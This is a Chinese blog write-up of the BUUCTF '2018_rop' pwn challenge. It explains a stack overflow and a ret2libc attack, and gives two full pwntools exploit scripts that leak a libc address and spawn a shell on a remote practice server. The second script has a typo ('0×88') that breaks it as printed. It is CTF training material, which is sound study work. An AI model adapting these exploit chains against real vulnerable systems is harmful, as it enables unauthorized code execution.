【BUUCTFPWN】铁人三项(第五赛区)_2018_rop

于 2023-01-15 20:40:36 发布
阅读量320 收藏 1
点赞数
分类专栏: PWN 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55368674/article/details/128697373
版权

先用checksec检查一下,只开了NX,能用栈溢出。
在这里插入图片描述
IDA反编译一下,里面也很简单,就调用了一个be_nice_to_peoplevulnerable_function两个函数。
在这里插入图片描述

一次查看一下,be_nice_to_people里面调用了getegid库函数,
vulnerable_function函数里顶一个了个136字节的栈空间,但是read函数可以输入256个字节,可以栈溢出。
在这里插入图片描述
在这里插入图片描述
看一看真个文件的函数表,和字符串表,没有找到system之类的函数,也没有/bin/sh之类的字符串。有很长的栈溢出空间,可以使用ret2libc解决这道题。

ret2libc题的精髓在于我们要找到将某一个函数的got表进行输出,一定要用到一个输出函数,第一次rop链的输出围绕着构造输出函数的寄存器设置、栈内容设置展开。拿到got表的输出后,然后是找到库内可利用函数的地址,第二次的rop链围绕着获取shell展开。

此处,我们除了可以使用getegid查找库,也可以使用read或者write查找库。

使用LibcSearcher解题的exploit如下:

from pwn import *
from LibcSearcher import *
context.binary = './2018_rop'
elf = context.binary
# context.log_level = 'debug'

io = remote('node4.buuoj.cn',28161)

getegid_got = elf.got['getegid']
getegid_plt = elf.plt['getegid']
write = elf.sym['write']
main = elf.sym['main']

payload = b'a'*(0x88+4)
payload += p32(write)
payload += p32(main)
payload += p32(1)
payload += p32(getegid_got)
payload += p32(4)

io.sendline(payload)
re = io.recv(4)
getegid_addr = u32(re)
print(re)
print(hex(getegid_addr))
libc = LibcSearcher('getegid',getegid_addr)
libc_base = getegid_addr - libc.dump('getegid')
system = libc_base + libc.dump('system')
bins = libc_base + libc.dump('str_bin_sh')
payload = b'a'*(0x88+4)
payload += p32(system)
payload += b'read'
payload += p32(bins)

io.sendline(payload)

io.sendline(b'cat flag')
io.interactive()

不知道由于什么原因,使用LibcSearcher没有跑通,出现了以下的错误:
在这里插入图片描述
换了一个网上找的exploit也是在这个语句有问题,之后查了查说是可能上游服务器崩溃了,具体原因不清楚。

之后是使用了手动查库然后一个个试出来的。
手动查库网址:https://libc.blukat.me/
在这里插入图片描述
手动查库的时候,自己第一遍先略过了后缀为64的库,结果都不对,才把剩下的都试了试,发现正确的库前面确实写着i386,以后手动查库的时候还是要准确一些,先找可能性最大的,不然真的浪费好多时间。

查库的exploit如下:

from pwn import *

context.binary = './2018_rop'
elf = context.binary
# context.log_level = 'debug'

io = remote('node4.buuoj.cn',28161)

getegid_got = elf.got['getegid']
getegid_plt = elf.plt['getegid']
write = elf.sym['write']
main = elf.sym['main']

payload = b'a'*(0x88+4)
payload += p32(write)
payload += p32(main)
payload += p32(1)
payload += p32(getegid_got)
payload += p32(4)

io.sendline(payload)
re = io.recv(4)
getegid_addr = u32(re)
print(re)
print(hex(getegid_addr))
libc_base = getegid_addr - 0x0bebc0
system = libc_base + 0x03cd10
bins = libc_base + 0x17b8cf
payload = b'a' *(0×88+4) + p32(system) + p32(main) + p32(bins)

io.sendline(payload)

io.sendline(b'cat flag')
io.interactive()
Razors_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
write函数的详解与read函数的详解
dangzhangjing97的博客
03-20 7万+
write() 头文件:#include<unistd.h> 原型: ssize_t write(int fd,const void*buf,size_t count); 参数说明: fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数 返回值: 成功:返回写入的字节数...
BUUCTF--铁人三项(第五赛区)_2018_rop1
最新发布
qq_30528603的博客
01-08 514
我这是打本地的代码,远程的话给了libc用libc,没给libc用LibcSearcher,个人感觉不太好用,很多时候找不到。漏洞点主要在vulnerable_function()函数中。1.第一次布局通过题目中的write,puts等函数将库函数地址泄露,并能返回到主程序。2.通过计算算出libc基地址进一步得到system地址。这题是一题标准的rop。3.找到libc中bin/sh的位置。4.第二次布局就是直接布置rop
buuctf|pwn-铁人三项(第五赛区)_2018_rop-wp
l2645470582_的博客
11-09 684
1.检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串,没有发现关键字符串 3.我们查看main函数里面的内容 我们发现有两个函数 进入第一个函数 进入第二个函数 在第二个函数里面发现buf溢出,buf有0x88个字节,但是read()函数读取了0x100个字节 4.system("/bin/sh") 我们在文件中没有找到可以拿到shellcode权限 所以我们要用libc,计算偏移量,拿到shellcode权限...
BUUCTF(pwn)铁人三项(第五赛区)_2018_rop
半岛铁盒的博客
03-30 349
最基本的 rop; from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25292) elf=ELF('./2') write_got=elf.got['write'] write_plt=elf.plt['write'] main=0x80484c6 payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl
2023 铁人三项 CTF --- Misc wp
3tefanie丶zhou的博客
01-12 2342
【不被喜欢的姑娘喜欢,是一件很伤心的事情,可天没有塌下来,该怎么活,还得怎么活。】
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
ROP技术解析与Netty应用实战》 ROP(Return-Oriented Programming,返回导向编程)是一种高级的利用技术,常用于安全领域,特别是在软件漏洞利用中。ROP允许攻击者通过跳转到现有代码片段(通常称为“gadgets”)...
arm64_rop_exploit:Arm64返回定向编程(ROP)漏洞
03-02
arm64_rop_exploit arm64 rop小工具二进制文件,用于将arm64反向外壳程序代码映射到内存中并执行代码这仅适用于目标arm64设备。 用于将rop小工具映射到内存中并从libc库执行shell代码的源代码。 在运行Ubuntu 18.04....
STM8_Unlock_Flash_ROP_issue_ROPCLEAR_unlock_stm8s003_stm8s103_
10-03
"stm8l001j3.pdf"和"stm8s001j3_2018.pdf"以及"STM8S001J3.pdf"虽然主要针对的是STM8L001J3和STM8S001J3型号,但可能包含了一些通用的信息和概念,例如闪存操作和安全特性,对于理解STM8S103的ROP问题也有参考价值。...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
中文UML建模工具Trufun Plato 2005.rar
06-03
中文UML建模工具Trufun Plato 2005.rar
铁人三项(第五赛区)_2018_rop
m0sway的博客
04-01 352
铁人三项(第五赛区)_2018_rop WriteUp BUU_PWN
shellcode题总结
seaaseesa的博客
05-01 1236
shellcode题总结 有时shellcode受限,最好的方法一般就是勉强的凑出sys read系统调用来输入shellcode主体。下面从几个题来加深理解。 starctf_2019_babyshell 现在shellcode字节允许的范围在表内 我们直接用IDA强制转为汇编,我们发现pop rdx、pop rdi、syscall可以用。 而执行shellcode时,正好...
信息安全铁人三项赛真题解析_对 [CrackMe] 【ctf2018信息安全铁人三项赛个人赛总决赛赛题分享 的一些补充...
weixin_39587238的博客
12-30 502
原贴主地址:https://www.52pojie.cn/thread-837939-1-1.htmllittenote这道题的exp#------------------------------------------------------------------------------------------------------------------------------------...
BUUCTF-Pwn-铁人三项(第五赛区)_2018_rop
餐桌上的猫
03-25 111
exp from pwn import* from LibcSearcher import * elf=ELF('/home/lhb/桌面/2018_rop') p=remote('node4.buuoj.cn',26218) main=0x80484C6 write_plt=elf.plt['write'] write_got=elf.got['write'] payload=b'a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p3
CTF2018_rop
凉水的博客
06-17 460
2018_rop
信息安全铁人三项赛--资质赛writeup
weixin_30639719的博客
03-17 634
[博客目录] 工具 Burp Suite stegsolve.jar 十六进制编辑器 赛题 第一题 第二题 第三题 第四题 第五题 第六题 1- 工具: 1.1- Burp Suite 一款可以进行再WEB应用程序的集成攻击测试平台。 常用的功能:抓包、重放、爆破 需求:(建议)Burp Suite + Firefox 介绍:Burp Suite使用介绍 代理设置+证书导入:Fi...
铁三入门测试题writeup
热门推荐
JBlock的博客
01-25 1万+
1.你是管理员吗?解题链接:http://ctf4.shiyanbar.com/web/root/index.php 打开链接,我们发现是一个登陆页面,第一步先看页面源码,发现一个password.txt,这里面可能有东西,访问一下http://ctf4.shiyanbar.com/web/root/password.txt发现一个密码字典。 然后用bp爆破密码为Nsf0cuS,我们在bp的
picoctf_2018_rop chain
03-16
picoctf_2018_rop chain是一道CTF比赛中的题目,需要使用ROP(Return Oriented Programming)技术来解决。ROP是一种利用程序中已有的代码段(称为gadget)来构造攻击代码的技术,通过将多个gadget串联起来,可以实现...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值